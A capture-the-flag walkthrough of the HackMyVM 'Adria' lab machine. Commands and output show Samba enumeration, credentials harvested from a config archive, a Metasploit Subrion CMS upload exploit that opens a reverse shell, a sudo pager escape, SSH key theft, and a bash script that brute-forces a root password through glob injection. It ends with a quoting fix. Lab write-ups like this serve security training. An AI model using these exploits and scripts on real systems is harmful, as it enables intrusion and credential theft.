Adria - cromiphi

00. Metainfo

Title: Adria
Author: Cromiphi
Release date: 2024-02-23
Download from: HackMyVM
Level: Medium
System: Linux
You’ll learn: CVE, Samba, Bash Blind Injection, Programming

01. Scan

netdiscover -r 172.16.1.0 -P
# _____________________________________________________________________________
#   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
# -----------------------------------------------------------------------------
# 172.16.1.190    08:00:27:a6:48:c4      1      60  PCS Systemtechnik GmbH
# 172.16.1.112    b6:11:7c:bb:29:b4      1      60  Unknown vendor
# 172.16.1.140    c8:5a:cf:5f:f5:f1      1      60  HP Inc.
# 172.16.1.229    0c:56:5c:9a:2e:ce      1      60  HyBroad Vision (Hong Kong) Technology Co Ltd
export IP=172.16.1.190
msf6 > db_nmap 172.16.1.190
# [*] Nmap: PORT    STATE SERVICE
# [*] Nmap: 22/tcp  open  ssh
# [*] Nmap: 80/tcp  open  http
# [*] Nmap: 139/tcp open  netbios-ssn
# [*] Nmap: 445/tcp open  microsoft-ds

02. Samba

enum4linux-ng -As $IP
# [*] Enumerating shares
# [+] Found 4 share(s):
# DebianShare:
#  comment: ''
#  type: Disk
# IPC$:
#  comment: IPC Service (Samba 4.17.12-Debian)
#  type: IPC
# nobody:
#  comment: Home Directories
#  type: Disk
# print$:
#  comment: Printer Drivers
#  type: Disk
# [*] Testing share DebianShare
# [+] Mapping: OK, Listing: OK
# [*] Testing share IPC$
# [+] Mapping: OK, Listing: NOT SUPPORTED
# [*] Testing share nobody
# [+] Mapping: DENIED, Listing: N/A
# [*] Testing share print$
# [+] Mapping: DENIED, Listing: N/A
smbclient //$IP/Debianshare
# Password for [WORKGROUP\root]:
# Try "help" to get a list of possible commands.
smb: \> ls
#   .                                   D        0  Mon Dec  4 10:32:45 2023
#   ..                                  D        0  Sat Jul 22 10:10:13 2023
#   configz.zip                         N  2756857  Mon Nov  6 16:56:25 2023

#                19480400 blocks of size 1024. 15694044 blocks available
smb: \> get configz.zip 
# getting file \configz.zip of size 2756857 as configz.zip (48949,8 KiloBytes/sec) (average 48949,9 KiloBytes/sec)
smb: \> exit

03. User and password

unzip configz.zip
find configz/ -exec grep -i pass {} 2>/dev/null \;
# ...
# d-i partman-crypto/passphrase password j******9
# d-i passwd/user-fullname string a***n
# ...

04. CMS Subrion

whatweb $IP/panel
# http://172.16.1.190/panel [301 Moved Permanently] Apache[2.4.57], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache/2.4.57 (Debian)], IP[172.16.1.190], RedirectLocation[http://172.16.1.190/panel/], Title[301 Moved Permanently]
# http://172.16.1.190/panel/ [200 OK] Apache[2.4.57], Bootstrap, Cookies[INTELLI_7da515443a], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.57 (Debian)], IP[172.16.1.190], JQuery, MetaGenerator[Subrion CMS - Open Source Content Management System], PasswordField[password], PoweredBy[Subrion], Script, Title[Login :: Powered by Subrion 4.2], UncommonHeaders[x-robots-tag], X-UA-Compatible[IE=Edge]
msf6 > search subrion

# Matching Modules
# ================

#   #  Name                                            Disclosure Date  Rank       Check  Description
#   -  ----                                            ---------------  ----       -----  -----------
#   0  exploit/multi/http/subrion_cms_file_upload_rce  2018-11-04       excellent  Yes    Intelliants Subrion CMS 4.2.1 - Authenticated File Upload Bypass to RCE


# Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/subrion_cms_file_upload_rce

msf6 > use 0
# [*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set password ******
# password => ******
msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set username ******
# username => ******
msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set rhosts 172.16.1.190
# rhosts => 172.16.1.190
msf6 exploit(multi/http/subrion_cms_file_upload_rce) > run -j
# [*] Exploit running as background job 0.
# [*] Exploit completed, but no session was created.

# [*] Started reverse TCP handler on 172.16.1.89:4444 
# msf6 exploit(multi/http/subrion_cms_file_upload_rce) > [*] Running automatic check ("set AutoCheck false" to disable)
# [*] Checking target web server for a response at: http://172.16.1.190/panel/
# [+] Target is running Subrion CMS.
# [*] Checking Subrion CMS version...
# [+] Target is running Subrion CMS Version 4.2.1.
# [+] The target appears to be vulnerable. However, this version check does not guarantee that the target is vulnerable, since a fix for the vulnerability can easily be applied by a web admin.
# [*] Connecting to Subrion Admin Panel login page to obtain CSRF token...
# [+] Successfully obtained CSRF token: Yr7kr42uQAuO8PaHQs6TdBMTFIf7TSIavUJW76z2
# [*] Logging in to Subrion Admin Panel at: http://172.16.1.190/panel/ using credentials admin:jojo1989
# [+] Successfully logged in as Administrator.
# [*] Preparing payload...
# [*] Sending POST data...
# [+] Successfully uploaded payload at: http://172.16.1.190/uploads/ladflxrocc.phar
# [*] Executing 'ladflxrocc.phar'... This file will be deleted after execution.
# [*] Sending stage (39927 bytes) to 172.16.1.190
# [*] Meterpreter session 1 opened (172.16.1.89:4444 -> 172.16.1.190:46340) at 2024-03-02 14:52:19 +0100

# msf6 exploit(multi/http/subrion_cms_file_upload_rce) > 
# [+] Successfully executed payload: http://172.16.1.190/uploads/ladflxrocc.phar
msf6 exploit(multi/http/subrion_cms_file_upload_rce) > sessions 

# Active sessions
# ===============

#  Id  Name  Type                   Information       Connection
#  --  ----  ----                   -----------       ----------
#  1         meterpreter php/linux  www-data @ adria  172.16.1.89:4444 -> 172.16.1.190:46340 (172.16.1.190)

msf6 exploit(multi/http/subrion_cms_file_upload_rce) > sessions 1
# [*] Starting interaction with 1...

meterpreter > shell
# Process 1277 created.
# Channel 0 created.
script /dev/null -c bash
#Script started, output log file is '/dev/null'.
www-data@adria:/var/www/html/uploads$ 

05. User adriana

www-data@adria:/$ sudo -l
# sudo -l
# Matching Defaults entries for www-data on adria:
#    env_reset, mail_badpass,
#    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
#    use_pty

#User www-data may run the following commands on adria:
#    (adriana) NOPASSWD: /usr/bin/scalar
www-data@adria:/$ sudo -uadriana /usr/bin/scalar help
# sudo -uadriana /usr/bin/scalar help
# WARNING: terminal is not fully functional
# Press RETURN to continue 

# SCALAR(1)                         Git Manual                         SCALAR(1)

#NAME
#       scalar - A tool for managing large Git repositories

# SYNOPSIS
#       scalar clone [--single-branch] [--branch <main-branch>] [--full-clone] <u
# rl> [<enlistment>]
#       scalar list
#       scalar register [<enlistment>]
#       scalar unregister [<enlistment>]
#       scalar run ( all | config | commit-graph | fetch | loose-objects | pack-f
# iles ) [<enlistment>]
#       scalar reconfigure [ --all | <enlistment> ]
#       scalar diagnose [<enlistment>]
#       scalar delete <enlistment>

# DESCRIPTION
#       Scalar is a repository management tool that optimizes Git for use in
#       large repositories. Scalar improves performance by configuring advanced
#       Git settings, maintaining repositories in the background, and helping
#       to reduce data sent across the network.

# Manual page scalar(1) line 1 (press h for help or q to quit)!bash
!bash
adriana@adria:/$ id
# id
# uid=1001(adriana) gid=1001(adriana) groups=1001(adriana),100(users)

Download or copy id_rsa from /home/adriana/.ssh/id_rsa and connect via ssh from your own machine.

ssh -i id_rsa adriana@$IP

06. User root

First way

Terminal 1

wget "https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64" && chmod +x pspy64 && ./pspy64
# 2024/03/02 15:16:54 CMD: UID=0    PID=1577   | /bin/bash /opt/backup 
# 2024/03/02 15:16:54 CMD: UID=0    PID=1579   | /usr/bin/sleep 1 
# 2024/03/02 15:16:55 CMD: UID=0    PID=1580   | /usr/bin/zip -r -e -P ****** /opt/backup.zip /var/www/html 
# 2024/03/02 15:17:01 CMD: UID=0    PID=1582   | /usr/sbin/CRON -f 
# 2024/03/02 15:17:01 CMD: UID=0    PID=1581   | /usr/sbin/CRON -f 

Terminal 2

adriana@adria:~$ sudo -l
# Matching Defaults entries for adriana on adria:
#    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

#User adriana may run the following commands on adria:
#    (ALL : ALL) NOPASSWD: /opt/backup
adriana@adria:~$ sudo /opt/backup
Password: *
#Authorized access
#  adding: var/www/html/ (stored 0%)
#  adding: var/www/html/uploads/ (stored 0%)
# ...

Second way

This way you don't need pspy64. It was inspired by Urkel Grue: just use a script.

#!/bin/bash
#Bash Blind Injection (bbi.sh)
#Kerszi 02.03.2024
#
# /opt/backup reads the password from stdin and exits 0 only when it is
# accepted. Because it matches the input as a shell pattern (that is why a
# trailing "*" works), "8eN*" is accepted as soon as "8eN" is the right
# prefix. The loop recovers the password one character at a time: the "*"
# stands in for the unknown rest, and exit status 0 confirms the prefix.

digits=({0..9})
alpha=({A..Z} {a..z})
all_num=({0..9} {A..Z} {a..z})
all_chars=({0..9} {A..Z} {a..z} _ -)

# Character set to try; switch to all_chars if the password may contain _ or -
charset=("${all_num[@]}")

counter=0
prefix=""
while true; do
    # Every candidate for this position failed: the next character is outside
    # the charset, so stop instead of looping forever.
    if (( counter >= ${#charset[@]} )); then
        printf '\rNo match for "%s" with the current charset\n' "$prefix"
        exit 1
    fi
    i=${charset[$counter]}
    # Known prefix + one guessed character + wildcard for the rest
    sudo /opt/backup <<< "$prefix$i*" &>/dev/null
    if [[ $? == 0 ]]; then
        prefix+="$i"
        counter=0
        # Without the wildcard: exit 0 means the whole password is known
        sudo /opt/backup <<< "$prefix" &>/dev/null
        if [[ $? == 0 ]]; then
            printf '\rPassword: %s  \n' "$prefix"
            exit 0
        fi
        # Start the next position from the first candidate again
        continue
    fi
    printf '\rPassword: %s%s*' "$prefix" "$i"
    ((counter++))
done
adriana@adria:~$ ./bbi.sh   
#Password: 8eNctPo*

adriana@adria:~$ time ./bbi.sh
#Password: 8eNct***************************

real    1m29.900s
user    0m3.532s
sys     0m2.793s

You now have the root password.
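Why the wildcard trick works, as an added example (not the /opt/backup script from the box, which this writeup never shows): the assumed root cause is a password check that uses the supplied value unquoted, so the shell treats it as a pattern rather than a literal string. The vulnerable check is shown beside the quoted form that fixes it; the secret value is constructed for the demo. Bash's `[[ $secret == $input ]]` behaves the same way, but POSIX `case` is used here so the example also runs under plain sh.

```shell
# Added example, not the box's /opt/backup. SECRET is a constructed sample
# value, not the real root password from the writeup.
SECRET='8eNctPo9'

# Vulnerable check: the unquoted $1 in the case pattern is a glob, so a guess
# such as "8eN*" is accepted whenever the secret starts with "8eN".
check_vuln() {
    case "$SECRET" in
        $1) return 0 ;;
        *)  return 1 ;;
    esac
}

# Hardened check: quoting $1 makes every character literal, so "*" only
# matches a secret that really contains an asterisk.
check_fixed() {
    case "$SECRET" in
        "$1") return 0 ;;
        *)    return 1 ;;
    esac
}

# Runs one guess through the given check and reports accepted/rejected
probe() {
    if "$1" "$2"; then echo accepted; else echo rejected; fi
}

# Side-by-side table: wildcard guesses pass only the vulnerable check, while
# the exact secret passes both.
demo() {
    for guess in '8eN*' '*' 'x*' '8eNctPo9'; do
        printf '%-10s vulnerable=%-8s fixed=%s\n' "$guess" \
            "$(probe check_vuln "$guess")" "$(probe check_fixed "$guess")"
    done
}

demo
```

The fix is the same wherever a script compares user input against a secret in `[[ ... ]]` or `case`: quote the right-hand side. Detection-wise, a script that is accepted by a partial guess ending in `*` is the giveaway, and the writeup's `/opt/backup` run under pspy also shows the backup password on the `zip -P` command line, which any local user can read from the process list.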
